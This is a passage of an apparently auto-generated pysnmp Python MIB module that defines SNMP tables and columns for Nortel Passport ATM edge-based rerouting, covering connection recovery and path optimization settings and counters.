mscAtmIfVpcSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 6, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVpcSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11))
mscAtmIfVpcEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVpcEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVpcEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVpcEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoIndex.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVpcEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40), )
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVpcEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVpcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVpcEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVpcEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 4, 11, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVpcEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVccSrcEbrOv = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2))
mscAtmIfVccSrcEbrOvRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatusEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRowStatus.setStatus('mandatory')
mscAtmIfVccSrcEbrOvComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvComponentName.setStatus('mandatory')
mscAtmIfVccSrcEbrOvStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvStorageType.setStatus('mandatory')
mscAtmIfVccSrcEbrOvIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvIndex.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20), )
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvTable.setStatus('mandatory')
mscAtmIfVccSrcEbrOvProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmNetworkingMIB", "mscAtmIfVccSrcIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccSrcEbrOvIndex"))
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvProvEntry.setStatus('mandatory')
mscAtmIfVccSrcEbrOvRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccSrcEbrOvOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 8, 2, 20, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1))).clone('yes')).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfVccSrcEbrOvOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfo = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12))
mscAtmIfVccEbrInfoRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusTable.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatusEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 1), RowStatus()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRowStatus.setStatus('mandatory')
mscAtmIfVccEbrInfoComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoComponentName.setStatus('mandatory')
mscAtmIfVccEbrInfoStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStorageType.setStatus('mandatory')
mscAtmIfVccEbrInfoIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoIndex.setStatus('mandatory')
mscAtmIfVccEbrInfoOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperTable.setStatus('mandatory')
mscAtmIfVccEbrInfoOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOperEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoRecoverySubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 1), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoRecoverySubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoOptimizationSubscribed = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 2), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoOptimizationSubscribed.setStatus('mandatory')
mscAtmIfVccEbrInfoConnectionRecovered = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 30, 1, 3), Integer32().subtype(subtypeSpec=ConstraintsUnion(SingleValueConstraint(0, 1))).clone(namedValues=NamedValues(("no", 0), ("yes", 1)))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoConnectionRecovered.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40), )
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsTable.setStatus('mandatory')
mscAtmIfVccEbrInfoStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfVccIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfVccEbrInfoIndex"))
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoStatsEntry.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfVccEbrInfoTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 5, 12, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfVccEbrInfoTotalPathOptimizations.setStatus('mandatory')
mscAtmIfUniEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7))
mscAtmIfUniEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusTable.setStatus('mandatory')
mscAtmIfUniEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfUniEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrRowStatus.setStatus('mandatory')
mscAtmIfUniEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrComponentName.setStatus('mandatory')
mscAtmIfUniEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrStorageType.setStatus('mandatory')
mscAtmIfUniEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfUniEbrIndex.setStatus('mandatory')
mscAtmIfUniEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfUniEbrProvTable.setStatus('mandatory')
mscAtmIfUniEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrProvEntry.setStatus('mandatory')
mscAtmIfUniEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfUniEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfUniEbrPathOptimization.setStatus('mandatory')
mscAtmIfUniEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfUniEbrOperTable.setStatus('mandatory')
mscAtmIfUniEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrOperEntry.setStatus('mandatory')
mscAtmIfUniEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfUniEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfUniEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsTable.setStatus('mandatory')
mscAtmIfUniEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmUniMIB", "mscAtmIfUniIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfUniEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfUniEbrStatsEntry.setStatus('mandatory')
mscAtmIfUniEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfUniEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 6, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfUniEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7))
mscAtmIfIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusTable.setStatus('mandatory')
mscAtmIfIispEbrRowStatusEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatusEntry.setStatus('mandatory')
mscAtmIfIispEbrRowStatus = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 1), RowStatus()).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrRowStatus.setStatus('mandatory')
mscAtmIfIispEbrComponentName = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 2), DisplayString()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrComponentName.setStatus('mandatory')
mscAtmIfIispEbrStorageType = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 4), StorageType()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrStorageType.setStatus('mandatory')
mscAtmIfIispEbrIndex = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 1, 1, 10), NonReplicated())
if mibBuilder.loadTexts: mscAtmIfIispEbrIndex.setStatus('mandatory')
mscAtmIfIispEbrProvTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20), )
if mibBuilder.loadTexts: mscAtmIfIispEbrProvTable.setStatus('mandatory')
mscAtmIfIispEbrProvEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrProvEntry.setStatus('mandatory')
mscAtmIfIispEbrConnectionRecovery = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 1), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrConnectionRecovery.setStatus('mandatory')
mscAtmIfIispEbrPathOptimization = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 20, 1, 2), OctetString().subtype(subtypeSpec=ValueSizeConstraint(1, 1)).setFixedLength(1).clone(hexValue="c0")).setMaxAccess("readwrite")
if mibBuilder.loadTexts: mscAtmIfIispEbrPathOptimization.setStatus('mandatory')
mscAtmIfIispEbrOperTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30), )
if mibBuilder.loadTexts: mscAtmIfIispEbrOperTable.setStatus('mandatory')
mscAtmIfIispEbrOperEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrOperEntry.setStatus('mandatory')
mscAtmIfIispEbrSubscribedConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 1), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrSubscribedConnections.setStatus('mandatory')
mscAtmIfIispEbrEligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 2), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrEligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrIneligibleRecoveredConnections = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 30, 1, 3), Gauge32().subtype(subtypeSpec=ValueRangeConstraint(0, 4294967295))).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrIneligibleRecoveredConnections.setStatus('mandatory')
mscAtmIfIispEbrStatsTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40), )
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsTable.setStatus('mandatory')
mscAtmIfIispEbrStatsEntry = MibTableRow((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1), ).setIndexNames((0, "Nortel-MsCarrier-MscPassport-AtmCoreMIB", "mscAtmIfIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmIispMIB", "mscAtmIfIispIndex"), (0, "Nortel-MsCarrier-MscPassport-AtmEbrMIB", "mscAtmIfIispEbrIndex"))
if mibBuilder.loadTexts: mscAtmIfIispEbrStatsEntry.setStatus('mandatory')
mscAtmIfIispEbrTotalConnectionRecoveries = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 1), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalConnectionRecoveries.setStatus('mandatory')
mscAtmIfIispEbrTotalPathOptimizations = MibTableColumn((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 7, 7, 40, 1, 2), Counter32()).setMaxAccess("readonly")
if mibBuilder.loadTexts: mscAtmIfIispEbrTotalPathOptimizations.setStatus('mandatory')
mscAtmIfVptIispEbr = MibIdentifier((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7))
mscAtmIfVptIispEbrRowStatusTable = MibTable((1, 3, 6, 1, 4, 1, 562, 36, 2, 1, 114, 9, 6, 7, 1), )
if mibBuilder.loadTexts: mscAtmIfVptIispEbrRowStatusTable.setStatus('mandatory')
